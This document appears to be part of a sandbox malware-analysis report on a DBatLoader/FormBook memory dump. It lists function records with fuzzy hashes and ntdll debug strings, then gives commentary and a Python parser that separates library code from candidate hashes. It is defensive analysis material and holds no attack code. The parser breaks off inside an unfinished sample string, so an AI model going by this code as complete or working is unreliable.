                                                                    • Opcode Fuzzy Hash: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                    • Instruction Fuzzy Hash: A6E08C32413A25EED735DF16ED04F8277A6AB54B10F04882EA006868A08A70AA86CA85
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                    • Instruction ID: c409b210b4686694612777660323fa23aa6db065f37effae48fab098d3a2e9ed
                                                                    • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                    • Instruction Fuzzy Hash: D6E08C32412A24EED7315E29DC08F8277A3FB98B11F148C2AE0851A0A48771A9C2DA64
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                    • Instruction ID: 08d12021de1eb5abbbe865b5bf794d445076a8ea96274e11659c9a97705c09b5
                                                                    • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                    • Instruction Fuzzy Hash: 1FE08633111A1887D718DE14D521B6677E4FF45760F05463EAA1347781C634E544C798
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 47b2c397f9dddc9fa4cddf1bcfaa7274b03e3a23cb36fcd59c030559d6d6eb6f
                                                                    • Instruction ID: ae6c345a17eccb81ba716b5b8fc7901433731f4a89388e4875f63143836f877b
                                                                    • Opcode Fuzzy Hash: 47b2c397f9dddc9fa4cddf1bcfaa7274b03e3a23cb36fcd59c030559d6d6eb6f
                                                                    • Instruction Fuzzy Hash: F5E08C331015946BC219EA5DED00E5A739AEFA4660F084221B25597290DA24AC00C7D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                    • Instruction ID: 4afb4a22c4551c8b79db56252420750a978591246f91ad12a4526dcb0ae87777
                                                                    • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                    • Instruction Fuzzy Hash: B1D05E36512A50AFC3368F1BEA04D13BBF9FFC4A107050A7FA54683920C670EC06CBA0
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 060d296e8d26ecb49ad336c8a787268f93ccbb25a937a2f458a648f6d28e60a5
                                                                    • Instruction ID: 77a7276216758b039d9562a200e1cf8666e3b7562f5a69f43371731926c75fba
                                                                    • Opcode Fuzzy Hash: 060d296e8d26ecb49ad336c8a787268f93ccbb25a937a2f458a648f6d28e60a5
                                                                    • Instruction Fuzzy Hash: 04D02E2820C2CCC3C60649888061BAA3F0E6742E44F2924BCC0440FE03CE174883E22A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                    • Instruction ID: 98f1ad488c8e9b01d276550e905fad030f611faba866fd17451aaccc91df1f93
                                                                    • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                    • Instruction Fuzzy Hash: 0AE08C36901684ABCF0ACF58C640F4EB7F5BF84B40F1408A8A1085B660C224EC01CB40
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                    • Instruction ID: 56dcf040ec6779893a77b69dfc48a89b63f6b8359b5e9e519d7e4b9bb8b81e4a
                                                                    • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                    • Instruction Fuzzy Hash: 3BD02273217031A3CB1886646C04F537B079B80AA0F0A006C340AD3800C0048C52C6E0
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                    • Instruction ID: 47702d2ff463c41d519706bebcdf437c48cccc01bd13b058d33f12ed560b90c5
                                                                    • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                    • Instruction Fuzzy Hash: F2D0123B1D054CBBCB119F65DC01F957BA9E764BA0F444020B509C75A0D63AE950D584
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b08709261d101a46ebea804f42c653200a08853130f42cecd955f39dcb7eb639
                                                                    • Instruction ID: 5a4d4dc4051034240f863798b1f930a527068f2b9a810b0067fc09054b636cd5
                                                                    • Opcode Fuzzy Hash: b08709261d101a46ebea804f42c653200a08853130f42cecd955f39dcb7eb639
                                                                    • Instruction Fuzzy Hash: F5D05E349010998BDF0ACB44C528D2E33B0FF50640B400878FA0092020E329C9028690
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e00a728dbbd978654da58184cd55ddbc76045e9f565c845072e6235403c28d91
                                                                    • Instruction ID: b3c2deb6a3f4cd26c92d40e2de4f5ed754cc320d02497cc8d2425824c07b39d9
                                                                    • Opcode Fuzzy Hash: e00a728dbbd978654da58184cd55ddbc76045e9f565c845072e6235403c28d91
                                                                    • Instruction Fuzzy Hash: 70D0A932000288ABC716EF48DD40F163BABEFA8B40F080020B50887222DA30FC60CA98
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 972c85bcb8a782688664b24d080d59a27c4310a263f83e6e242ad4fda11e0a41
                                                                    • Instruction ID: b6b85f0780a75377d631aa4a1bb92d1a0dd6fc0f1390f6f80f792e5463e263d1
                                                                    • Opcode Fuzzy Hash: 972c85bcb8a782688664b24d080d59a27c4310a263f83e6e242ad4fda11e0a41
                                                                    • Instruction Fuzzy Hash: 70D05E72111440DFE72ACB08C946F3673E4FB10B04F4540B8B00ACB920C728E805DB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                    • Instruction ID: b087c6d513e9cae53cb1afee1e81303b48e9de159ad339cbc509b851d1bb18b6
                                                                    • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                    • Instruction Fuzzy Hash: 25D09275212A80DFC2068B18C5A0B0533E4BB84B84F8148A0E845CBB22D62CD940CA10
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                    • Instruction ID: 6dc70b97d012b6e5f8f959816d571407c32638b83f380e712b48be014f357689
                                                                    • Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                    • Instruction Fuzzy Hash: 41C02B2F1152C089CD078F3003133D0BFA0D7034C0F0D04C2D0C10F113C0148213C625
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                    • Instruction ID: 3155d46bc181696d35d315bc3b8b66d265228cde08511be9f005965234f5c7bd
                                                                    • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                    • Instruction Fuzzy Hash: E7B01232213544CFD7025720CB00B1837AABF117C0F0900F0650089870E6288910E501
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: c7b04120ed25980d63b0c23cc95c4a11e83c129013bf8daaa78be6faa35c9880
                                                                    • Instruction ID: 86fc545bafccaa25238cb71ec28441ad5e3f3c9959ac0717a2a76182a49d13c6
                                                                    • Opcode Fuzzy Hash: c7b04120ed25980d63b0c23cc95c4a11e83c129013bf8daaa78be6faa35c9880
                                                                    • Instruction Fuzzy Hash: C551B4B6E0411ABEDB14DB9C89D097EB7F8BF0C240B508A7AE464D7645D234DE42CBA0
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: 88c7fdf146f19aa1059e0adea21a0103a7ac651d79c68e5f59fbcb9cbe4b80f6
                                                                    • Instruction ID: 7bb19af56c806e4953e670beb605bf8880b4ef93f836b050a7c8fce631b9f3ab
                                                                    • Opcode Fuzzy Hash: 88c7fdf146f19aa1059e0adea21a0103a7ac651d79c68e5f59fbcb9cbe4b80f6
                                                                    • Instruction Fuzzy Hash: 6F5115B5B0065AAECB24CF9CC89097FB7F9BF48280B448C6AE495D3685E674DF418760
                                                                    Strings
                                                                    • Execute=1, xrefs: 29044713
                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 29044725
                                                                    • ExecuteOptions, xrefs: 290446A0
                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 29044742
                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 290446FC
                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 29044655
                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 29044787
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                    • API String ID: 0-484625025
                                                                    • Opcode ID: 77fd364c471e1e5e476e247517e67b5329ef8a852225f30c1d5b4e5a83fe5f10
                                                                    • Instruction ID: 3c55f887322ebb99437a2c68af007cd117483628b7a172968feee9dd9390c6b0
                                                                    • Opcode Fuzzy Hash: 77fd364c471e1e5e476e247517e67b5329ef8a852225f30c1d5b4e5a83fe5f10
                                                                    • Instruction Fuzzy Hash: A7514B71A0020D7AEB159BA4DC95FAD33E9EF18740F4008B9D609E7191DB74AE83CF51
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                    • Instruction ID: 6996956165d6854eabfe2127ff0935c01efb48a2335107afcaf25875c9cf3ffb
                                                                    • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                    • Instruction Fuzzy Hash: 3A020671508345AFC305CFA8C890A6AB7F5EFD8740F009D6DFA898B254DB71E946CB92
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-$0$0
                                                                    • API String ID: 1302938615-699404926
                                                                    • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                    • Instruction ID: e87e401468621d9c63c298e0479fc1ea9b8997e41b31ee52ba19da5bf626cd15
                                                                    • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                    • Instruction Fuzzy Hash: 3081C270E4524D9FDB088F6CC8917EEBBF1AF55B50F144A6EE850A7299C7348983CB60
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$[$]:%u
                                                                    • API String ID: 48624451-2819853543
                                                                    • Opcode ID: 7f414b371e2548de35a141dec5caca8070fdac9d4c661c4e005572633047517f
                                                                    • Instruction ID: 52151278ad9f216bf16522fd24f91cd670ddffb961d1631f09745ec03da66793
                                                                    • Opcode Fuzzy Hash: 7f414b371e2548de35a141dec5caca8070fdac9d4c661c4e005572633047517f
                                                                    • Instruction Fuzzy Hash: 27215176A0011DABDF04DF69CC50AAE7BFDFF68684F540526EA05E3204E7309A128BA1
                                                                    Strings
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 290402E7
                                                                    • RTL: Re-Waiting, xrefs: 2904031E
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 290402BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                    • API String ID: 0-2474120054
                                                                    • Opcode ID: 430040cc30fe00f03e32e5f2b2ba550eb7b306a99d3921d3828f6f7ae9629b7c
                                                                    • Instruction ID: cd15b7cd355920e0386fce2c53ed234e97397f15ad464b8bd0266276bf1649b5
                                                                    • Opcode Fuzzy Hash: 430040cc30fe00f03e32e5f2b2ba550eb7b306a99d3921d3828f6f7ae9629b7c
                                                                    • Instruction Fuzzy Hash: 62E1CB71A09745AFD314CF28C880F0AB7E2FF98324F154A39E5A49B6E1DB74D946CB42
                                                                    Strings
                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 29047B7F
                                                                    • RTL: Resource at %p, xrefs: 29047B8E
                                                                    • RTL: Re-Waiting, xrefs: 29047BAC
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 0-871070163
                                                                    • Opcode ID: a323ba30b7f7ee54cc7b374fc2a55e4265d306c97be7bd769183e62eaaa5a6e1
                                                                    • Instruction ID: 3b1b892f5f977cbdefc63fdc6e4282d40d26bd3dc1fc168813be9d83ea3f4029
                                                                    • Opcode Fuzzy Hash: a323ba30b7f7ee54cc7b374fc2a55e4265d306c97be7bd769183e62eaaa5a6e1
                                                                    • Instruction Fuzzy Hash: 3C41E331B0170A9FDB14CE25C850B6AB7E6EF98710F000E3DF95A97681EB31E946CB91
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2904728C
                                                                    Strings
                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 29047294
                                                                    • RTL: Resource at %p, xrefs: 290472A3
                                                                    • RTL: Re-Waiting, xrefs: 290472C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-605551621
                                                                    • Opcode ID: 9a0c957e159198239edeacf0099312d9170be68a9f35c089d75706c6edd13be9
                                                                    • Instruction ID: 3c6e8e64729d35da936797d243751ecf9bda53fdf74c70b83641861c539002fe
                                                                    • Opcode Fuzzy Hash: 9a0c957e159198239edeacf0099312d9170be68a9f35c089d75706c6edd13be9
                                                                    • Instruction Fuzzy Hash: 1941CE31A0120AABDB14CE25CD41F5AB7E5FFA4710F105E29F955AB280EB21F943CBD1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$]:%u
                                                                    • API String ID: 48624451-3050659472
                                                                    • Opcode ID: 1c48d30d2fb7d45b27769c2c6da82a0990ba0563669949ea570cf1dcef3ed1f2
                                                                    • Instruction ID: 4c1da6039557bd4850ecb6eed2e3e9c990da9a31a9f980a037cda2e67ec7e4d2
                                                                    • Opcode Fuzzy Hash: 1c48d30d2fb7d45b27769c2c6da82a0990ba0563669949ea570cf1dcef3ed1f2
                                                                    • Instruction Fuzzy Hash: EF317376A0021DAECB14CE2DCC50BAE77F8BF58650F854966E949E3240EB309E459BA0
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-
                                                                    • API String ID: 1302938615-2137968064
                                                                    • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                    • Instruction ID: 8774e5d6c11751dd728355f2a67d7ffb1a61ddd625fd2e110a460c20b7f05925
                                                                    • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                    • Instruction Fuzzy Hash: 60919371E4021E9BDB18CF69C881AAFB7F5EF44760F104E2EE955E72D1DB30AA428750
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$@
                                                                    • API String ID: 0-1194432280
                                                                    • Opcode ID: 07b2d7d86670e6b8c86f434b0508221333e29dbfefc9d6f0457ee8c1b6c358e1
                                                                    • Instruction ID: a9fa64c64ec987af761f015e7582f3b635dd2e17e79d2558ad7aada520e331cc
                                                                    • Opcode Fuzzy Hash: 07b2d7d86670e6b8c86f434b0508221333e29dbfefc9d6f0457ee8c1b6c358e1
                                                                    • Instruction Fuzzy Hash: 08814C76D0126D9BDB25CF94CC44BDEB7B5AF08750F0445EAAA19B7280E7305E81CFA4
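The function records above all come from the same memory dump (process 3, region 0x28FA0000, "based on PE: true"), and the format strings they reference ("CLIENT(ntdll): ...", "RTL: Enter CriticalSection Timeout ...", "RTL: Acquire Exclusive Sem Timeout ...") are ntdll's own internal debug strings, so those functions are Windows library code that happens to live in the dumped region rather than code written by the DBatLoader or FormBook authors. Their Opcode and Instruction Fuzzy Hashes therefore make poor pivots. The parser below is an added example, not Joe Sandbox's own tooling: it reads records in the layout shown on this page (APIs / Strings bullets, then Memory Dump Source, Joe Sandbox IDA Plugin and Similarity key-value bullets), strips the xref and ref suffixes, and separates ntdll-debug-string functions from the remaining candidates whose fuzzy hashes are worth carrying forward. The record layout and the "•" bullet marker are assumptions taken from the report text, and the embedded sample is constructed from three records on this page.

```python
"""Parse Joe Sandbox 'Code Analysis' function records and split out
functions that are ntdll library code (identified by ntdll's own debug
strings) from candidates worth pivoting on.

Added example; not Joe Sandbox's parser. Record layout assumed from the
report text: optional 'APIs' / 'Strings' sections with bullet items, then
'Memory Dump Source', 'Joe Sandbox IDA Plugin' and 'Similarity' sections
whose bullets are 'Key: value' pairs. 'Similarity' closes a record.
"""
import re
from dataclasses import dataclass, field

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}
# Format-string prefixes that belong to ntdll's internal debug output.
NTDLL_DEBUG_PREFIXES = ("CLIENT(ntdll):", "RTL:")
_XREF_SUFFIX = re.compile(r",\s*xrefs?:\s*[0-9A-Fa-f]+\s*$")   # ", xrefs: 29044725"
_API_REF_SUFFIX = re.compile(r"\s+ref:\s*[0-9A-Fa-f]+\s*$")     # " ref: 2904728C"


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    def is_ntdll_noise(self) -> bool:
        """True when the function references ntdll's own debug strings."""
        return any(s.startswith(NTDLL_DEBUG_PREFIXES) for s in self.strings)


def parse_records(text: str) -> list:
    records, current, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            # Similarity is the last section of a record: any header after it
            # starts the next record.
            if section == "Similarity":
                records.append(current)
                current = FunctionRecord()
            section = line
            continue
        if not line.startswith("•"):
            continue                      # page chrome, not a record bullet
        item = line[1:].strip()
        if section == "APIs":
            current.apis.append(_API_REF_SUFFIX.sub("", item))
        elif section == "Strings":
            current.strings.append(_XREF_SUFFIX.sub("", item))
        elif section == "Memory Dump Source":
            # "Source File: X, Offset: Y, based on PE: true" holds several pairs.
            for piece in item.split(", "):
                key, _, value = piece.partition(":")
                current.fields[key.strip()] = value.strip()
        elif section in ("Joe Sandbox IDA Plugin", "Similarity"):
            key, _, value = item.partition(":")   # values may contain ':' themselves
            current.fields[key.strip()] = value.strip()
    if current.fields or current.apis or current.strings:
        records.append(current)
    return records


def triage(records: list):
    """Return (ntdll-noise records, candidate records, candidate fuzzy hashes)."""
    noise = [r for r in records if r.is_ntdll_noise()]
    candidates = [r for r in records if not r.is_ntdll_noise()]
    hashes = [r.fields.get("Instruction Fuzzy Hash") for r in candidates]
    return noise, candidates, hashes


# Constructed sample: three records copied from this report's code-analysis section.
SAMPLE_REPORT = """\
Strings
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 29044725
• ExecuteOptions, xrefs: 290446A0
Memory Dump Source
• Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$ExecuteOptions
• Opcode ID: 77fd364c471e1e5e476e247517e67b5329ef8a852225f30c1d5b4e5a83fe5f10
• Instruction Fuzzy Hash: A7514B71A0020D7AEB159BA4DC95FAD33E9EF18740F4008B9D609E7191DB74AE83CF51
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
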